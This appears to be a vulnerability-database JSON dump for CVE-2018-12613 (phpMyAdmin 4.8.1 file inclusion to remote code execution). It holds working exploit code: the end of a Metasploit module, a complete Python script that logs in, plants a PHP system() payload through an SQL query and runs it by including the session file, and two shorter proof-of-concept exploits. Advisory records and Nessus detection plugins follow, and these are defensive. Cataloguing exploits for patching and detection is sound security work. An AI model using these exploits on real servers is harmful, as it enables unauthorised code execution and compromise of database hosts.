eval(base64_decode(\\\"#{Rex::Text.encode_base64(payload.encoded)}\\\")); ?>'\" \n \n \n#Preparing sql queries \ndbsql = \"CREATE DATABASE #{database};\" \ntablesql = \"CREATE TABLE #{database}.#{table}(#{column} varchar(4096) DEFAULT #{col_val});\" \ndropsql = \"DROP DATABASE #{database};\" \ndirsql = 'SHOW VARIABLES WHERE Variable_Name Like \"%datadir\";' \n \n#Create database \nres = query(uri, dbsql, cookies, token) \nif res.nil? || res.code != 200 \nfail_with(Failure::UnexpectedReply, \"#{peer} - Failed to create database\") \nend \n \n#Create table and column \nres = query(uri, tablesql, cookies, token) \nif res.nil? || res.code != 200 \nfail_with(Failure::UnexpectedReply, \"#{peer} - Failed to create table\") \nend \n \n#Find datadir \nres = query(uri, dirsql, cookies, token) \nif res.nil? || res.code != 200 \nfail_with(Failure::UnexpectedReply, \"#{peer} - Failed to find data directory\") \nend \n \nunless res.body =~ /^<td data.*?>(.*)?</ \nfail_with(Failure::UnexpectedReply, \"#{peer} - Failed to find data directory\") \nend \n \n#Creating include path \nif mytarget == 'Windows' \n#Table file location \ndata_path = $1.gsub(/\\\\/, '/') \ndata_path = data_path.sub(/^.*?\\//, '/') \ndata_path << \"#{database}/#{table}.frm\" \nelse \n#Session path location \n/phpMyAdmin=(?<session_name>.*?);/ =~ cookies \ndata_path = \"/var/lib/php/sessions/sess_#{session_name}\" \nend \n \nres = lfi(uri, data_path, cookies, token) \n \n#Drop database \nres = query(uri, dropsql, cookies, token) \nif res.nil? || res.code != 200 \nprint_error(\"#{peer} - Failed to drop database #{database}. Might drop when your session closes.\") \nend \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/148534/phpmyadmin_lfi_rce.rb.txt"}, {"lastseen": "2021-10-25T17:34:29", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-10-25T00:00:00", "type": "packetstorm", "title": "phpMyAdmin 4.8.1 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12613"], "modified": "2021-10-25T00:00:00", "id": "PACKETSTORM:164623", "href": "https://packetstormsecurity.com/files/164623/phpMyAdmin-4.8.1-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: phpMyAdmin 4.8.1 - Remote Code Execution (RCE) \n# Date: 17/08/2021 \n# Exploit Author: samguy \n# Vulnerability Discovery By: ChaMd5 & Henry Huang \n# Vendor Homepage: http://www.phpmyadmin.net \n# Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz \n# Version: 4.8.1 \n# Tested on: Linux - Debian Buster (PHP 7.3) \n# CVE : CVE-2018-12613 \n \n#!/usr/bin/env python \n \nimport re, requests, sys \n \n# check python major version \nif sys.version_info.major == 3: \nimport html \nelse: \nfrom six.moves.html_parser import HTMLParser \nhtml = HTMLParser() \n \nif len(sys.argv) < 7: \nusage = \"\"\"Usage: {} [ipaddr] [port] [path] [username] [password] [command] \nExample: {} 192.168.56.65 8080 /phpmyadmin username password whoami\"\"\" \nprint(usage.format(sys.argv[0],sys.argv[0])) \nexit() \n \ndef get_token(content): \ns = re.search('token\"\\s*value=\"(.*?)\"', content) \ntoken = html.unescape(s.group(1)) \nreturn token \n \nipaddr = sys.argv[1] \nport = sys.argv[2] \npath = sys.argv[3] \nusername = sys.argv[4] \npassword = sys.argv[5] \ncommand = sys.argv[6] \n \nurl = \"http://{}:{}{}\".format(ipaddr,port,path) \n \n# 1st req: check login page and version \nurl1 = url + \"/index.php\" \nr = requests.get(url1) \ncontent = r.content.decode('utf-8') \nif r.status_code != 200: \nprint(\"Unable to find the version\") \nexit() \n \ns = re.search('PMA_VERSION:\"(\\d+\\.\\d+\\.\\d+)\"', content) \nversion = s.group(1) \nif version != \"4.8.0\" and version != \"4.8.1\": \nprint(\"The target is not exploitable\".format(version)) \nexit() \n \n# get 1st token and cookie \ncookies = r.cookies \ntoken = get_token(content) \n \n# 2nd req: login \np = {'token': token, 'pma_username': username, 'pma_password': password} \nr = requests.post(url1, cookies = cookies, data = p) \ncontent = r.content.decode('utf-8') \ns = re.search('logged_in:(\\w+),', content) \nlogged_in = s.group(1) \nif logged_in == \"false\": \nprint(\"Authentication failed\") \nexit() \n \n# get 2nd token and cookie \ncookies = r.cookies \ntoken = get_token(content) \n \n# 3rd req: execute query \nurl2 = url + \"/import.php\" \n# payload \npayload = '''select '<?php system(\"{}\") ?>';'''.format(command) \np = {'table':'', 'token': token, 'sql_query': payload } \nr = requests.post(url2, cookies = cookies, data = p) \nif r.status_code != 200: \nprint(\"Query failed\") \nexit() \n \n# 4th req: execute payload \nsession_id = cookies.get_dict()['phpMyAdmin'] \nurl3 = url + \"/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_{}\".format(session_id) \nr = requests.get(url3, cookies = cookies) \nif r.status_code != 200: \nprint(\"Exploit failed\") \nexit() \n \n# get result \ncontent = r.content.decode('utf-8', errors=\"replace\") \ns = re.search(\"select '(.*?)\\n'\", content, re.DOTALL) \nif s != None: \nprint(s.group(1)) \n \n`\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/164623/phpmyadmin481-exec.txt"}, {"lastseen": "2018-06-23T09:28:55", "description": "", "cvss3": {}, "published": "2018-06-22T00:00:00", "type": "packetstorm", "title": "phpMyAdmin 4.8.1 Code Execution / Local File Inclusion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-12613"], "modified": "2018-06-22T00:00:00", "id": "PACKETSTORM:148283", "href": "https://packetstormsecurity.com/files/148283/phpMyAdmin-4.8.1-Code-Execution-Local-File-Inclusion.html", "sourceData": "`# Exploit Title: phpMyAdmin 4.8.1 - Local File Inclusion to Remote Code Execution \n# Date: 2018-06-21 \n# Exploit Author: VulnSpy \n# Vendor Homepage: http://www.phpmyadmin.net \n# Software Link: https://github.com/phpmyadmin/phpmyadmin/archive/RELEASE_4_8_1.tar.gz \n# Version: 4.8.0, 4.8.1 \n# Tested on: php7 mysql5 \n# CVE : CVE-2018-12613 \n \n1. Run SQL Query : select '<?php phpinfo();exit;?>' \n2. Include the session file : \nhttp://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/148283/phpmyadmin4581-lfiexec.txt"}, {"lastseen": "2018-11-27T18:22:38", "description": "", "cvss3": {}, "published": "2018-11-27T00:00:00", "type": "packetstorm", "title": "phpMyAdmin 4.8.1 Authenticated Local File Inclusion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-12613"], "modified": "2018-11-27T00:00:00", "id": "PACKETSTORM:150466", "href": "https://packetstormsecurity.com/files/150466/phpMyAdmin-4.8.1-Authenticated-Local-File-Inclusion.html", "sourceData": "`# Exploit Title: phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion \n# Date: 27-11-2018 \n# Exploit Author: Lucian Ioan Nitescu \n# Contact: https://twitter.com/LucianNitescu \n# Webiste: https://nitesculucian.github.io \n# Vendor Homepage: https://www.phpmyadmin.net/ \n# Software Link: https://www.phpmyadmin.net/files/4.8.1/ \n# Version: 4.8.1 \n# Tested on: Ubuntu 18.04 \n# CVE: CVE-2018-12613 \n \n# 1. Description: \n \n# An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the \"$cfg['AllowArbitraryServer'] = true\" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the \"$cfg['ServerDefault'] = 0\" case (which bypasses the login requirement and runs the vulnerable code without any authentication). \n \n# 2. Proof of Concept: \n \nimport requests \n \n# input the target \nVALID_PHPMYADMIN_URL = \"\" \n \n# input a valid session (After authentification) \nVALID_PHPMYADMIN_SESSION = \"\" \n \nburp0_url = VALID_PHPMYADMIN_URL + \"/import.php\" \nburp0_cookies = {\"phpMyAdmin\": VALID_PHPMYADMIN_SESSION, \"pma_lang\": \"en\", \"pmaUser-1\": \"%7B%22iv%22%3A%22N2lLHGoe2cuUN5uvAbz8ww%3D%3D%22%2C%22mac%22%3A%222b02670d8802823d99c3ccaf1f0ece9f2eb4c536%22%2C%22payload%22%3A%22mR69lSBATnU%2B%2Bs5jL0c3yw%3D%3D%22%7D\", \"pmaAuth-1\": \"%7B%22iv%22%3A%22xoIEoAgAvAxL%5C%2F%5C%2Fa3c0iX8Q%3D%3D%22%2C%22mac%22%3A%22243d87482efacdde27e3d2a6c6e85ae3b903af66%22%2C%22payload%22%3A%22yl27EG%5C%2FIUngUnyZIKNa8O45enMc8iZyHjFpLmiDkWSs%3D%22%7D\"} \nburp0_headers = {\"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0\", \"Accept\": \"*/*\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\", \"X-Requested-With\": \"XMLHttpRequest\", \"Connection\": \"close\"} \nburp0_data={\"is_js_confirmed\": \"0\", \"token\": \"?[I568P@ei7B?OUd\", \"pos\": \"0\", \"goto\": \"server_sql.php\", \"message_to_show\": \"Your SQL query has been executed successfully.\", \"prev_sql_query\": '', \"sql_query\": \"select '<?php $output = shell_exec(\\\"ls -al; date; id;\\\");echo \\\"<pre>$output</pre>\\\";exit;?>'\", \"sql_delimiter\": \";\", \"show_query\": \"1\", \"fk_checks\": \"0\", \"fk_checks\": \"1\", \"SQL\": \"Go\", \"ajax_request\": \"true\", \"ajax_page_request\": \"true\", \"_nocache\": \"1543255823534938840\", \"token\": \"?[I568P@ei7B?OUd\"} \nrequests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data) \n \nprint \"While autentificated:\" \n \nprint \"- Please check: \" + VALID_PHPMYADMIN_URL + \"/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_\" + VALID_PHPMYADMIN_SESSION \n \nprint \"- Please check: \" + VALID_PHPMYADMIN_URL + \"/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php5/sess_\" + VALID_PHPMYADMIN_SESSION \n \n# 3. Solution: \n \n# Upgrade to version 4.8.2 or above. \n`\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/150466/phpmyadmin481auth-lfi.txt"}], "debiancve": [{"lastseen": "2023-06-23T14:40:27", "description": "An issue was discovered in phpMyAdmin 4.8.x before 4.8.2, in which an attacker can include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the \"$cfg['AllowArbitraryServer'] = true\" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the \"$cfg['ServerDefault'] = 0\" case (which bypasses the login requirement and runs the vulnerable code without any authentication).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-21T20:29:00", "type": "debiancve", "title": "CVE-2018-12613", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12613"], "modified": "2018-06-21T20:29:00", "id": "DEBIANCVE:CVE-2018-12613", "href": "https://security-tracker.debian.org/tracker/CVE-2018-12613", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:24:38", "description": "A local file inclusion vulnerability exists in phpMyAdmin. The vulnerability is due to improper sanitization of the request URI. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could lead to information disclosure.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-10-02T00:00:00", "type": "checkpoint_advisories", "title": "phpMyAdmin index.php Local File Inclusion (CVE-2018-12613)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12613"], "modified": "2019-09-26T00:00:00", "id": "CPAI-2018-1087", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-05-18T14:28:56", "description": "According to its self-reported version number, the phpMyAdmin application hosted on the remote web server is 4.8.x prior to 4.8.2. It is, therefore, affected by the file inclusion and remote code execution vulnerabilities\n\nNote that Nessus has not attempted to exploit these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2018-06-27T00:00:00", "type": "nessus", "title": "phpMyAdmin 4.8.x < 4.8.2 Vulnerability (PMASA-2018-4)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-12613"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin"], "id": "PHPMYADMIN_PMASA_2018_4.NASL", "href": "https://www.tenable.com/plugins/nessus/110722", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(110722);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2018-12613\");\n script_bugtraq_id(104532);\n\n script_name(english:\"phpMyAdmin 4.8.x < 4.8.2 Vulnerability (PMASA-2018-4)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP application that is affected by\nfile inclusion and remote code execution vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the phpMyAdmin\napplication hosted on the remote web server is 4.8.x prior to\n4.8.2. It is, therefore, affected by the file inclusion and \nremote code execution vulnerabilities\n\nNote that Nessus has not attempted to exploit these issues but has\ninstead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.phpmyadmin.net/security/PMASA-2018-4/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to phpMyAdmin version 4.8.2 or later.\nAlternatively, apply the patch referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-12613\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"phpMyAdmin 4.8.1 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'phpMyAdmin Authenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/27\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:phpmyadmin:phpmyadmin\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"phpMyAdmin_detect.nasl\");\n script_require_keys(\"www/PHP\", \"installed_sw/phpMyAdmin\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nappname = \"phpMyAdmin\";\nget_install_count(app_name:appname, exit_if_zero:TRUE);\n\nport = get_http_port(default:80, php:TRUE);\ninstall = get_single_install(app_name:appname, port:port, exit_if_unknown_ver:TRUE);\ndir = install['path'];\nurl = build_url(qs:dir, port:port);\nversion = install['version'];\n\nif (version =~ \"^4(\\.8)?$\") audit(AUDIT_VER_NOT_GRANULAR, appname, port, version);\nif (version !~ \"^4\\.8\\.[0-9]\") audit(AUDIT_WEB_APP_NOT_INST, appname + \" 4.8.x\", port);\n\nre = make_array(\n -2, \"-beta(\\d+)\",\n -1, \"-rc(\\d+)\"\n);\n\n# Affected version\n# 4.8.x < 4.8.2\ncut_off = '4.8.0';\nfixed_ver = '4.8.2';\nif (ver_compare(ver:version, minver:cut_off, fix:fixed_ver, regexes:re) == -1)\n{\n report =\n '\\n URL : ' + url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_ver +\n '\\n';\n\n security_report_v4(port:port, severity:SECURITY_WARNING, extra:report);\n}\n\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, url, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:29:14", "description": "This update for phpMyAdmin fixes multiple issues.\n\nSecurity issues fixed :\n\n - CVE-2018-12613: File inclusion and remote code execution attack (boo#1098751)\n\n - CVE-2018-12581: XSS in Designer feature (boo#1098752)\n\nThis update to version 4.8.2 also contains number of upstream bug fixes and improvements.", "cvss3": {}, "published": "2018-06-25T00:00:00", "type": "nessus", "title": "openSUSE Security Update : phpMyAdmin (openSUSE-2018-669)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-12581", "CVE-2018-12613"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:phpmyadmin", "cpe:/o:novell:opensuse:15.0", "cpe:/o:novell:opensuse:42.3"], "id": "OPENSUSE-2018-669.NASL", "href": "https://www.tenable.com/plugins/nessus/110680", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-669.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(110680);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-12581\", \"CVE-2018-12613\");\n\n script_name(english:\"openSUSE Security Update : phpMyAdmin (openSUSE-2018-669)\");\n script_summary(english:\"Check for the openSUSE-2018-669 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for phpMyAdmin fixes multiple issues.\n\nSecurity issues fixed :\n\n - CVE-2018-12613: File inclusion and remote code execution\n attack (boo#1098751)\n\n - CVE-2018-12581: XSS in Designer feature (boo#1098752)\n\nThis update to version 4.8.2 also contains number of upstream bug\nfixes and improvements.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1098751\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1098752\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"phpMyAdmin 4.8.1 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'phpMyAdmin Authenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"phpMyAdmin-4.8.2-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"phpMyAdmin-4.8.2-15.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:28:59", "description": "The phpMyAdmin development team reports : Summary XSS in Designer feature Description A Cross-Site Scripting vulnerability was found in the Designer feature, where an attacker can deliver a payload to a user through a specially crafted database name. Severity We consider this attack to be of moderate severity. Summary File inclusion and remote code execution attack Description A flaw has been discovered where an attacker can include (view and potentially execute) files on the server.\n\nThe vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages.\n\nAn attacker must be authenticated, except in these situations :\n\n- $cfg['AllowArbitraryServer'] = true: attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin\n\n- $cfg['ServerDefault'] = 0: this bypasses the login and runs the vulnerable code without any authentication Severity We consider this to be severe. Mitigation factor Configuring PHP with a restrictive `open_basedir` can greatly restrict an attacker's ability to view files on the server. Vulnerable systems should not be run with the phpMyAdmin directives $cfg['AllowArbitraryServer'] = true or $cfg['ServerDefault'] = 0", "cvss3": {}, "published": "2018-06-25T00:00:00", "type": "nessus", "title": "FreeBSD : phpmyadmin -- remote code inclusion and XSS scripting (17cb6ff3-7670-11e8-8854-6805ca0b3d42)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-12581", "CVE-2018-12613"], "modified": "2021-05-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:phpmyadmin", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_17CB6FF3767011E888546805CA0B3D42.NASL", "href": "https://www.tenable.com/plugins/nessus/110675", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110675);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/05/04\");\n\n script_cve_id(\"CVE-2018-12581\", \"CVE-2018-12613\");\n\n script_name(english:\"FreeBSD : phpmyadmin -- remote code inclusion and XSS scripting 